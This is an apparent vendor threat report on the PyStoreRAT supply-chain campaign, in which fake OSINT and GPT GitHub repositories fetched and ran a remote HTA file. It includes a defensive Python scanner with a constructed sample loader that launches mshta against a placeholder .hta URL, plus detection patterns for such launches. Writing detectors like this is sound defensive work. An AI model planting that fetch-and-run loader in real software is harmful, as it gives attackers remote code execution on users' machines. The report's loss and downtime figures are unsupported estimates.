Executive Summary
In late 2025, cybersecurity researchers uncovered a supply chain attack involving malicious repositories on GitHub impersonating open-source Python utilities themed around OSINT and GPT automation. These repos covertly delivered a previously unseen JavaScript-based Remote Access Trojan dubbed PyStoreRAT, using minimal code to retrieve and execute a remote HTA file. Unsuspecting developers and security professionals, lured by the project's legitimate appearance, risked compromise when cloning or running the code, resulting in unauthorized remote access and potential data exfiltration. The campaign highlights the growing sophistication of attacks abusing trusted developer platforms and open-source supply chains.
This incident underscores the urgent need for organizations to audit third-party code sources, bolster code supply chain security, and monitor for emerging malware targeting developer ecosystems. The tactic reflects broader trends in social engineering, weaponized open-source projects, and the exploitation of generative AI themes by threat actors.
Why This Matters Now
The prevalence of fake utility repositories delivering advanced RATs raises the urgency for organizations and developers to reassess the security of their software supply chains. As trust in open-source code is exploited by attackers, unchecked adoption of tools advertised as helpful or AI-powered greatly increases the risk of malware infiltration and data breaches.
Attack Path Analysis
Attackers leveraged fake OSINT and GPT-themed GitHub repositories to lure victims into executing a malicious Python script, initiating the download and execution of a remote HTA file (Initial Compromise). Once a foothold was established, the PyStoreRAT payload enabled further code execution, potentially allowing privilege escalation through credential theft or abuse of user rights (Privilege Escalation). The RAT's presence allowed movement across cloud or containerized environments, targeting additional internal systems (Lateral Movement). The infected host connected to a remote command and control server, facilitating persistent attacker communications (Command & Control). Collected data or credentials were exfiltrated via outbound traffic under attacker control (Exfiltration). Finally, attackers retained persistent access, which could be used for additional payloads, ransomware, or further disruptive actions (Impact).
Kill Chain Progression
Initial Compromise
Description
Victims cloned/downloaded malicious Python repositories from GitHub, which executed scripts to silently download and launch a remote HTA file, installing PyStoreRAT.
MITRE ATT&CK® Techniques
Supply Chain Compromise
Drive-by Compromise
Command and Scripting Interpreter: JavaScript
Ingress Tool Transfer
User Execution: Malicious Link
Shared Modules
Phishing: Spearphishing Link
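The initial compromise above depends on a few lines of Python that launch a remote HTA file, which is something a pre-execution audit of a cloned repository can look for. The following is an added example, not code from the campaign or from the cited reports; it assumes the loader reaches the HTA through a process-launch call and leaves an `mshta` or `.hta` string literal in the source, and the samples and function names are constructed for illustration.

```python
import ast

# Assumption: Windows runs HTA files through mshta.exe, so a loader either
# names "mshta" or carries a URL/path ending in ".hta".
EXEC_CALLS = {"system", "popen", "Popen", "run", "call", "check_call", "check_output", "startfile"}

# Constructed samples, not code from the campaign; example.invalid never resolves.
SAMPLE_SUSPICIOUS = '''import subprocess
URL = "https://example.invalid/update.hta"
def _init():
    subprocess.Popen(["mshta", URL], shell=False)
'''
SAMPLE_BENIGN = 'import subprocess\nsubprocess.run(["git", "status"], check=True)\n'

def _call_name(node):
    f = node.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _strings(node):
    """Yield every string literal found under an AST node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value

def _is_hta_marker(text):
    low = text.lower()
    return "mshta" in low or low.split("?")[0].strip().endswith(".hta")

def scan_source(source, filename="<repo file>"):
    """Return sorted (line, call, literal) findings for process launches tied to HTA."""
    tree = ast.parse(source, filename=filename)
    assigned = {}  # name -> HTA-looking literal, so `Popen(["mshta", URL])` resolves URL
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
            hits = [s for s in _strings(node.value) if _is_hta_marker(s)]
            if hits:
                assigned[node.targets[0].id] = hits[0]
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or _call_name(node) not in EXEC_CALLS:
            continue
        literals = [s for s in _strings(node) if _is_hta_marker(s)]
        literals += [assigned[n.id] for n in ast.walk(node) if isinstance(n, ast.Name) and n.id in assigned]
        if literals:
            findings.append((node.lineno, _call_name(node), literals[0]))
    return sorted(findings)

if __name__ == "__main__":
    print(scan_source(SAMPLE_SUSPICIOUS), scan_source(SAMPLE_BENIGN))
```

The check parses files without importing or running them, so it is safe to apply to an untrusted clone. It matches plain string literals only; encoded or runtime-assembled strings need a review of the decoding code itself.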
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Change and Software Development Management
Control ID: 6.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management
Control ID: Article 16
CISA Zero Trust Maturity Model 2.0 – Software Supply Chain Security
Control ID: Asset Management - Software Supply Chain
NIS2 Directive – Supply Chain Security for Essential and Important Entities
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
High risk from fake GitHub repositories targeting developers with PyStoreRAT malware disguised as OSINT and GPT utilities, compromising development environments.
Information Technology/IT
Critical exposure through supply chain attacks on development tools and repositories, requiring enhanced egress security and threat detection capabilities.
Computer/Network Security
Direct targeting through malicious OSINT tools affecting security professionals, necessitating zero trust segmentation and anomaly detection for protection.
Government Administration
Significant vulnerability as OSINT tools are widely used for intelligence gathering, requiring strict policy enforcement and encrypted traffic monitoring.
Sources
- Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads: https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
- PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionals: https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
- PyStoreRAT Malware Campaign: Fake OSINT and GPT GitHub Repositories Target Security Researchers and Cryptocurrency Users: https://www.rescana.com/post/pystorerat-malware-campaign-fake-osint-and-gpt-github-repositories-target-security-researchers-and
- Warning to Developers: New 'PyStoreRAT' Malware Campaign Disguised as OSINT and GPT Tools on GitHub: https://www.thaicert.or.th/en/2025/12/15/warning-to-developers-new-pystorerat-malware-campaign-disguised-as-osint-and-gpt-tools-on-github/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust network segmentation, egress policy enforcement, east-west traffic controls, and integrated anomaly detection would have significantly limited the spread and impact of PyStoreRAT at multiple stages—detecting the initial compromise, blocking lateral movement, and containing data exfiltration to external control servers.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Real-time inspection of inline traffic identifies and blocks weaponized downloads.
Control: Zero Trust Segmentation
Mitigation: Network segmentation limits visibility and access to privileged resources.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized internal communication and flags anomalous movement.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to known or suspicious command servers are detected and blocked.
Control: Cloud Firewall (ACF)
Mitigation: Outbound exfiltration attempts are blocked and alerted on.
Rapid detection of post-compromise activity and containment of malicious behavior.
Impact at a Glance
Affected Business Functions
- Software Development
- Cybersecurity Analysis
- Cryptocurrency Transactions
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive data, including credentials, financial information, and intellectual property, due to the deployment of information-stealing malware like Rhadamanthys.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust segmentation and identity-based access controls to restrict workload communication and lateral movement.
- Enforce strict egress security policies with real-time domain and threat intelligence filtering to block outbound connections to malicious destinations.
- Deploy distributed inline traffic inspection (CNSF) to detect and block malicious downloads and anomalous behaviors in real time.
- Monitor east-west traffic and implement microsegmentation to confine potential threats to their initial entry point.
- Integrate automated anomaly detection, logging, and incident response to rapidly identify and contain post-compromise activity.



